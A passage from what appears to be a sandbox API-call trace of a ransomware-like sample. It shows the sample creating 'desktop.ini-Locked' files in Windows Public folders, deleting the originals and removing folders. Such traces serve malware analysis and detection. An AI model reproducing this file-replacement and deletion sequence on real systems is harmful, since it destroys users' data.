(lpFileName="C:\\Users\\Public\\Documents\\desktop.ini-Locked" (normalized: "c:\\users\\public\\documents\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x438 [0309.648] GetFileType (hFile=0x438) returned 0x1 [0309.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0309.648] GetFileType (hFile=0x438) returned 0x1 [0309.650] CloseHandle (hObject=0x438) returned 1 [0309.650] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\desktop.ini", lpFilePart=0x0) returned 0x25 [0309.650] DeleteFileW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini")) returned 1 [0309.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0309.651] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Music", lpFilePart=0x0) returned 0x22 [0309.651] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Music\\", lpFilePart=0x0) returned 0x23 [0309.651] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0309.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af14c) returned 1 [0309.654] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music", nBufferLength=0x105, lpBuffer=0x1aed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Music", lpFilePart=0x0) returned 0x22 [0309.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af160) returned 1 [0309.654] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music" (normalized: "c:\\users\\public\\documents\\my music"), fInfoLevelId=0x0, lpFileInformation=0x1af1e0 | out: lpFileInformation=0x1af1e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0309.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0309.654] RemoveDirectoryW (lpPathName="C:\\Users\\Public\\Documents\\My Music" (normalized: "c:\\users\\public\\documents\\my music")) returned 1 [0309.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0309.656] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Pictures", lpFilePart=0x0) returned 0x25 [0309.656] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Pictures\\", lpFilePart=0x0) returned 0x26 [0309.656] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0309.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af14c) returned 1 [0309.658] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures", nBufferLength=0x105, lpBuffer=0x1aed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Pictures", lpFilePart=0x0) returned 0x25 [0309.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af160) returned 1 [0309.658] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures" (normalized: "c:\\users\\public\\documents\\my pictures"), fInfoLevelId=0x0, lpFileInformation=0x1af1e0 | out: lpFileInformation=0x1af1e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0309.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0309.658] RemoveDirectoryW (lpPathName="C:\\Users\\Public\\Documents\\My Pictures" (normalized: "c:\\users\\public\\documents\\my pictures")) returned 1 [0309.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0309.659] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Videos", lpFilePart=0x0) returned 0x23 [0309.659] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Videos\\", lpFilePart=0x0) returned 0x24 [0309.659] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0309.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af14c) returned 1 [0309.661] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos", nBufferLength=0x105, lpBuffer=0x1aed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Videos", lpFilePart=0x0) returned 0x23 [0309.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af160) returned 1 [0309.661] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos" (normalized: "c:\\users\\public\\documents\\my videos"), fInfoLevelId=0x0, lpFileInformation=0x1af1e0 | out: lpFileInformation=0x1af1e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d5bfea2, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0309.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0309.661] RemoveDirectoryW (lpPathName="C:\\Users\\Public\\Documents\\My Videos" (normalized: "c:\\users\\public\\documents\\my videos")) returned 1 [0309.662] CoTaskMemAlloc (cb=0x20c) returned 0x6c7110 [0309.662] SHGetFolderPathW (in: hwnd=0x0, csidl=54, hToken=0x0, dwFlags=0x0, pszPath=0x6c7110 | out: pszPath="C:\\Users\\Public\\Pictures") returned 0x0 [0309.665] CoTaskMemFree (pv=0x6c7110) [0309.665] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures", lpFilePart=0x0) returned 0x18 [0309.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0309.665] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures", lpFilePart=0x0) returned 0x18 [0309.665] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\", lpFilePart=0x0) returned 0x19 [0309.665] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.666] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.666] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0309.666] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0309.666] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0309.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0309.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0309.666] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures", lpFilePart=0x0) returned 0x18 [0309.666] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\", lpFilePart=0x0) returned 0x19 [0309.667] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.667] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.667] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0309.667] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0309.667] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0309.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0309.668] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\desktop.ini-Locked", lpFilePart=0x0) returned 0x2b [0309.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0309.668] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini-Locked" (normalized: "c:\\users\\public\\pictures\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x448 [0309.668] GetFileType (hFile=0x448) returned 0x1 [0309.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0309.668] GetFileType (hFile=0x448) returned 0x1 [0309.670] CloseHandle (hObject=0x448) returned 1 [0309.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\desktop.ini", lpFilePart=0x0) returned 0x24 [0309.670] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini")) returned 1 [0309.810] CoTaskMemAlloc (cb=0x20c) returned 0x6c7110 [0309.811] SHGetFolderPathW (in: hwnd=0x0, csidl=53, hToken=0x0, dwFlags=0x0, pszPath=0x6c7110 | out: pszPath="C:\\Users\\Public\\Music") returned 0x0 [0309.812] CoTaskMemFree (pv=0x6c7110) [0309.812] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music", lpFilePart=0x0) returned 0x15 [0309.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0309.812] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music", lpFilePart=0x0) returned 0x15 [0309.812] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\", lpFilePart=0x0) returned 0x16 [0309.812] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.813] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.813] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0309.813] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0309.814] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0309.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0309.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0309.814] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music", lpFilePart=0x0) returned 0x15 [0309.814] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\", lpFilePart=0x0) returned 0x16 [0309.814] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.815] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.815] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0309.815] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0309.815] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0309.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0309.816] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\desktop.ini-Locked", lpFilePart=0x0) returned 0x28 [0309.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0309.816] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\desktop.ini-Locked" (normalized: "c:\\users\\public\\music\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x478 [0309.817] GetFileType (hFile=0x478) returned 0x1 [0309.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0309.817] GetFileType (hFile=0x478) returned 0x1 [0309.819] CloseHandle (hObject=0x478) returned 1 [0309.819] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\desktop.ini", lpFilePart=0x0) returned 0x21 [0309.819] DeleteFileW (lpFileName="C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini")) returned 1 [0309.882] CoTaskMemAlloc (cb=0x20c) returned 0x6c7110 [0309.882] SHGetFolderPathW (in: hwnd=0x0, csidl=55, hToken=0x0, dwFlags=0x0, pszPath=0x6c7110 | out: pszPath="C:\\Users\\Public\\Videos") returned 0x0 [0309.883] CoTaskMemFree (pv=0x6c7110) [0309.884] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos", lpFilePart=0x0) returned 0x16 [0309.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0309.884] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos", lpFilePart=0x0) returned 0x16 [0309.884] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\", lpFilePart=0x0) returned 0x17 [0309.884] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.884] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.885] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0309.885] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0309.885] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0309.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0309.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0309.886] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos", nBufferLength=0x105, lpBuffer=0x1aecd8, 